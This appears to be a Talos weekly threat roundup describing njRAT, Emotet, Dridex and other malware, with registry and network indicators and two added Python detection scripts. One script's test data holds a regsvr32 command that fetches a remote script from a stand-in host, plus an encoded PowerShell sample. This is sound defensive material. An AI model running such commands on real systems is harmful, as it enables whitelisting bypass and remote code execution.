Today, Talos is publishing a glimpse into the most prevalent threats we've observed between July 3 and July 10. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.
As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.
For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.
The most prevalent threats highlighted in this roundup are:
| Threat Name | Type | Description |
|---|---|---|
| Win.Packed.njRAT-8479097-0 | Packed | njRAT, also known as Bladabindi, is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes and remotely turn on the victim's webcam and microphone. njRAT was developed by the Sparclyheason group. Some of the largest attacks using this malware date back to 2014. |
| Win.Malware.NetWire-8479400-0 | Malware | NetWire is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, remote desktop, and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails. |
| Win.Packed.Dridex-8486639-0 | Packed | Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine. |
| Win.Trojan.Fareit-8493652-0 | Trojan | The Fareit trojan is primarily an information stealer that can download and install other malware. |
| Win.Dropper.Generickdz-8494215-0 | Dropper | This is a BobSoft Delphi application that wraps malware. The malware uses process hollowing to hide from detection and achieves persistence across reboots by leveraging an autostart key in the Windows registry. |
| Win.Packed.LokiBot-8568668-1 | Packed | Lokibot is an information-stealing malware designed to siphon off sensitive information stored on an infected device. It is modular in nature, supporting the ability to steal sensitive information from many popular applications. It is commonly pushed via malicious documents delivered via spam emails. |
| Win.Trojan.Razy-8568648-0 | Trojan | Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host, encrypts the data, and sends it to a command and control (C2) server. Information collected might include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence. |
| Win.Malware.Emotet-8568701-0 | Malware | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails. |
Threat Breakdown
Win.Packed.njRAT-8479097-0
Indicators of Compromise
IOCs collected from dynamic analysis of 25 samples
| Registry Key | Value Name | Occurrences |
|---|---|---|
| <HKCU>\ENVIRONMENT | SEE_MASK_NOZONECHECKS | 25 |
| <HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON | ParseAutoexec | 25 |
| <HKCU>\SOFTWARE\27B4710398AE0B763559DF62D775BA29 | | 2 |
| <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | 27b4710398ae0b763559df62d775ba29 | 2 |
| <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | 27b4710398ae0b763559df62d775ba29 | 2 |
| <HKCU>\SOFTWARE\27B4710398AE0B763559DF62D775BA29 | [kl] | 2 |
| <HKCU>\SOFTWARE\74FB347B3D36AFEEF9601FC49748F387 | | 2 |
| <HKCU>\SOFTWARE\74FB347B3D36AFEEF9601FC49748F387 | [kl] | 2 |
| <HKCU>\SOFTWARE\58340164489AFF059FE46AB17B861A07 | | 2 |
| <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | 58340164489aff059fe46ab17b861a07 | 2 |
| <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | 58340164489aff059fe46ab17b861a07 | 2 |
| <HKCU>\SOFTWARE\58340164489AFF059FE46AB17B861A07 | [kl] | 2 |
| <HKCU>\SOFTWARE\3073A267DD6BA57599509E1FC89383AB | | 2 |
| <HKCU>\SOFTWARE\3073A267DD6BA57599509E1FC89383AB | [kl] | 2 |
| <HKCU>\SOFTWARE\F53BD214B970381275BB6CE3C71B0345 | [kl] | 1 |
| <HKCU>\SOFTWARE\7D37CA2C4B7AFA2D4D222003A595ED82 | | 1 |
| <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | 7d37ca2c4b7afa2d4d222003a595ed82 | 1 |
| <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | 7d37ca2c4b7afa2d4d222003a595ed82 | 1 |
| <HKCU>\SOFTWARE\7D37CA2C4B7AFA2D4D222003A595ED82 | [kl] | 1 |
| <HKCU>\SOFTWARE\B8ECBB9B55BF8E520EA66CE3B1D1F053 | | 1 |
| <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | b8ecbb9b55bf8e520ea66ce3b1d1f053 | 1 |
| <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | b8ecbb9b55bf8e520ea66ce3b1d1f053 | 1 |
| <HKCU>\SOFTWARE\B8ECBB9B55BF8E520EA66CE3B1D1F053 | [kl] | 1 |
| <HKCU>\SOFTWARE\7003E42B55F54D8B8C83FCE037328D7A | | 1 |
| <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | 7003e42b55f54d8b8c83fce037328d7a | 1 |
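The registry IOCs above share one shape: a Run value named with 32 hex characters, a matching HKCU\Software\<same hex> key, and a [kl] keylog value under it. The following Python script, an added example that is not part of the Talos post, correlates those three signals per identifier over constructed Sysmon-style registry events; the event format, the sample lines and the "two signals = high confidence" rule are assumptions, not Talos detection logic.

```python
import re
from typing import Dict, List, Tuple

# Constructed Sysmon-style registry "value set" events (not telemetry from the
# roundup). One event per line: key path and value name, tab-separated.
SAMPLE_EVENTS = """\
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\t27b4710398ae0b763559df62d775ba29
HKCU\\Software\\27B4710398AE0B763559DF62D775BA29\t[kl]
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\tOneDrive
HKLM\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\t7d37ca2c4b7afa2d4d222003a595ed82
HKCU\\Environment\tSEE_MASK_NOZONECHECKS
"""

RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run$", re.I)
HEX32 = re.compile(r"^[0-9a-f]{32}$", re.I)
CONFIG_KEY = re.compile(r"^HKCU\\Software\\([0-9a-f]{32})$", re.I)
SIGNALS = ("run_value", "config_key", "keylog_value")


def parse_events(text: str) -> List[Tuple[str, str]]:
    """Split the constructed log into (key path, value name) pairs."""
    rows = []
    for line in text.splitlines():
        if line.strip():
            key, _, value = line.partition("\t")
            rows.append((key, value))
    return rows


def score_events(events: List[Tuple[str, str]]) -> Dict[str, Dict[str, bool]]:
    """Group the three njRAT-style signals by the 32-hex identifier they share."""
    findings: Dict[str, Dict[str, bool]] = {}
    for key, value in events:
        if RUN_KEY.search(key) and HEX32.match(value):
            findings.setdefault(value.lower(), dict.fromkeys(SIGNALS, False))["run_value"] = True
        m = CONFIG_KEY.match(key)
        if m:
            entry = findings.setdefault(m.group(1).lower(), dict.fromkeys(SIGNALS, False))
            entry["config_key"] = True
            if value == "[kl]":  # keystroke buffer value seen in the table above
                entry["keylog_value"] = True
    return findings


def triage(findings: Dict[str, Dict[str, bool]]) -> Dict[str, str]:
    """Two or more signals for one identifier: high confidence. One: a lead to check."""
    return {ident: ("high" if sum(sig.values()) >= 2 else "lead")
            for ident, sig in findings.items()}


if __name__ == "__main__":
    for ident, level in triage(score_events(parse_events(SAMPLE_EVENTS))).items():
        print(f"{level:5} {ident}")
```

A Run value with a hex-only name is a lead on its own, since legitimate software rarely names autostart entries that way, but the paired HKCU\Software key is what distinguishes this family's pattern.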
| Mutexes | Occurrences |
|---|---|
| <32 random hex characters> | 25 |
| IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences |
|---|---|
| 141[.]255[.]152[.]254 | 1 |
| 141[.]255[.]157[.]71 | 1 |
Domain Names contacted by malware. Does not indicate maliciousness
Exploit Prevention
Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
Dealply adware detected - (16504)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
CVE-2019-0708 detected - (3320)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption that can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Process hollowing detected - (1859)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Excessively long PowerShell command detected - (1573)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker-controlled server.
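The two detections above both reduce to checks on process-creation telemetry: an unusually long or encoded PowerShell command line, and regsvr32.exe being handed a remote URL instead of a local DLL. The Python below is an added example, not Cisco AMP's own logic; the record format, the sample commands, the 1000-character threshold and the placeholder domain are all constructed for illustration.

```python
import re
from typing import Dict, List, Tuple

# Constructed process-creation records (image path, command line), not telemetry
# from the roundup. The second entry mimics a long obfuscated argument.
SAMPLE_PROCS: List[Tuple[str, str]] = [
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -NoProfile -Command Get-Date"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -w hidden -enc " + "QUFB" * 400),
    (r"C:\Windows\System32\regsvr32.exe",
     "regsvr32.exe /s /u /i:http://placeholder.invalid/reg.sct"),
    (r"C:\Windows\System32\regsvr32.exe",
     r"regsvr32.exe /s C:\Program Files\Vendor\component.dll"),
]

LONG_CMDLINE = 1000  # assumed threshold; tune it against a baseline of your own hosts
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s", re.I)
REMOTE_URL = re.compile(r"https?://", re.I)


def classify(image: str, cmdline: str) -> List[str]:
    """Return the detection names that apply to one process-creation record."""
    hits: List[str] = []
    exe = image.rsplit("\\", 1)[-1].lower()
    if exe == "powershell.exe":
        if len(cmdline) > LONG_CMDLINE:
            hits.append("powershell_long_cmdline")
        if ENCODED_FLAG.search(cmdline):  # -EncodedCommand and its abbreviations
            hits.append("powershell_encoded")
    elif exe == "regsvr32.exe" and REMOTE_URL.search(cmdline):
        hits.append("regsvr32_remote_script")  # Squiblydoo-style whitelisting bypass
    return hits


def scan(records: List[Tuple[str, str]]) -> Dict[int, List[str]]:
    """Map record index -> detections, keeping only records that fired."""
    flagged: Dict[int, List[str]] = {}
    for i, (image, cmdline) in enumerate(records):
        hits = classify(image, cmdline)
        if hits:
            flagged[i] = hits
    return flagged


if __name__ == "__main__":
    for idx, names in scan(SAMPLE_PROCS).items():
        print(idx, SAMPLE_PROCS[idx][1][:60], names)
```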
Installcore adware detected - (385)
Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
Kovter injection detected - (206)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also fileless malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Palikan browser hijacker detected - (138)
Palikan is a potentially unwanted application (PUA) and browser hijacker, a type of malware that most of the time does not explicitly or completely state its function or purpose. When it is present on the system, it may change the default homepage, change the search engine, redirect traffic to malicious sites, install add-ons, extensions, or plug-ins, open unwanted windows or show advertising. Palikan commonly arrives as a file dropped by other malware or as a file downloaded unknowingly from a malicious site. It has also been closely associated with DealPly.
Gamarue malware detected - (118)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
IcedID malware detected - (71)
IcedID is a banking Trojan. It uses both web browser injection and browser redirection to steal banking and/or other financial credentials and data. The features and sophistication of IcedID demonstrate the malware author's knowledge and technical skill for this kind of fraud, and suggest the authors have previous experience creating banking Trojans. IcedID has been observed being installed by Emotet or Ursnif. Systems infected with IcedID should also be scanned for additional malware infections.